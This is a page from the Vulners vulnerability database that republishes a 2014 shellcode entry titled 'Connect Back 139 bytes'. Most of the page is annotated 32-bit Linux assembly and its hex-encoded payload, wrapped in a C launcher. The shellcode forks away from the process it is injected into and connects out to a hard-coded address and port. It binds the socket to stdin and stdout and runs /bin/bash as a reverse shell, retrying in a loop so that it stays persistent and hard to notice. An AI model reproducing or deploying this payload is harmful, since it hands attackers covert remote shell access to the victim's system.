Vulners
Lucene search
Connect Back 139 bytes
/*
#Title: connect back shellcode that splits from the process it was injected into, and then stays persistent and difficult to remove. It is also very close to invisible due to some interesting effects created by forking, and calling the rdtsc instruction
#length: 139 bytes
#Date: 14 September 2014
#Author: Aaron Yool (aka: MadMouse)
#tested On: Linux kali 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux
*/
/*
;
; part of my shellcode for noobs lesson series hosted in #goatzzz on
irc.enigmagroup.org
;
; 32bit call: eax args: ebx, ecx, edx, esi, edi, and ebp
;
; part of my shellcode for noobs lesson series hosted in #goatzzz on
irc.enigmagroup.org
;
; 32bit call: eax args: ebx, ecx, edx, esi, edi, and ebp
[bits 32]
section .text
global _start
_start:
; fork(void);
xor eax,eax ; cleanup after rdtsc
xor edx,edx ; ....
xor ebx,ebx ; cleanup the rest
xor ecx,ecx ; ....
mov al,0x02
int 0x80
cmp eax,1 ; if this is a child, or we have failed to clone
jl fork ; jump to the main code
jmp exit
fork:
; socket(AF_INET, SOCK_STREAM, 0);
push eax
push byte 0x1 ; SOCK_STREAM
push byte 0x2 ; AF_INET
mov al, 0x66 ; sys_socketcall
mov bl,0x1 ; sys_socket
mov ecx,esp
int 0x80
; dup2(s,i);
mov ebx,eax ; s
xor ecx,ecx
loop:
mov al,0x3f ; sys_dup2
int 0x80
inc ecx
cmp ecx,4
jne loop
; connect(s, (sockaddr *) &addr,0x10);
push 0x0101017f ; IP = 127.1.1.1
push word 0x391b ; PORT = 6969
push word 0x2 ; AF_INET
mov ecx,esp
push byte 0x10
push ecx ;pointer to arguments
push ebx ; s -> standard out/in
mov ecx,esp
mov al,0x66
int 0x80
xor ecx,ecx
sub eax,ecx
jnz cleanup ; cleanup and start over
; fork(void);
mov al,0x02
int 0x80
cmp eax,1 ; if this is a child, or we have failed to clone
jl client ; jump to the shell
xor eax,eax
push eax
jmp cleanup ; cleanup and start over
client:
; execve(SHELLPATH,{SHELLPATH,0},0);
mov al,0x0b
jmp short sh
load_sh:
pop esi
push edx ; 0
push esi
mov ecx,esp
mov ebx,esi
int 0x80
cleanup:
; close(%ebx)
xor eax,eax
mov al,0x6
int 0x80
pause
rdtsc
pause
jmp _start
exit:
; exit(0);
xor eax,eax
mov al,0x1
xor ebx,ebx
int 0x80
sh:
call load_sh
db "/bin/bash"
*/
const char evil[] =
"\x31\xc0\x31\xd2\x31\xdb\x31\xc9\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x02\xeb\x62\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x04\x75\xf6\x68\x7f\x01\x01\x01\x66\x68\x1b\x39\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\xcd\x80\x31\xc9\x29\xc8\x75\x1b\xb0\x02\xcd\x80\x83\xf8\x01\x7c\x05\x31\xc0\x50\xeb\x0d\xb0\x0b\xeb\x1f\x5e\x52\x56\x89\xe1\x89\xf3\xcd\x80\x31\xc0\xb0\x06\xcd\x80\xf3\x90\x0f\x31\xf3\x90\xeb\x8b\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";
typedef void (*shellcode)(void);
void main(void)
{
((shellcode)evil)();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Sep 2014 00:00Current